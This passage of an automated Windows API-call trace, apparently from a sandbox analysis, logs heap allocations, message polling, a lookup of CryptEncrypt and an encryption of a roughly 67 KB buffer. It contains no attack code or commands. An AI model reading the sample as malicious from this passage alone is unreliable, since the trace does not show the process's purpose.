hHeap=0x970000) returned 1 [0189.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.610] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.610] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.611] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0189.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0189.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0189.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0189.612] CharLowerBuffW (in: lpsz="byte[67288]", cchLength=0xb | out: lpsz="byte[67288]") returned 0xb [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0189.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0189.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3bf0728 [0189.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0189.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0189.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0189.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0189.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d7) returned 0x3c00e08 [0189.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0189.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d7) returned 0x3c114e8 [0189.621] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0189.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0189.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.621] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.621] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.625] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0189.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0189.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0189.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50a88 [0189.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0189.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.634] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0189.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54350 [0189.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0189.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0189.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0189.639] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf0728*, pdwDataLen=0x8cef60*=0x106d7, dwBufLen=0x106d8 | out: pbData=0x3bf0728*, pdwDataLen=0x8cef60*=0x106d8) returned 1 [0189.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0189.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0189.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0189.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0189.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0189.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0189.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0189.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0189.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0189.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0189.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0189.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0189.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0189.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0189.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 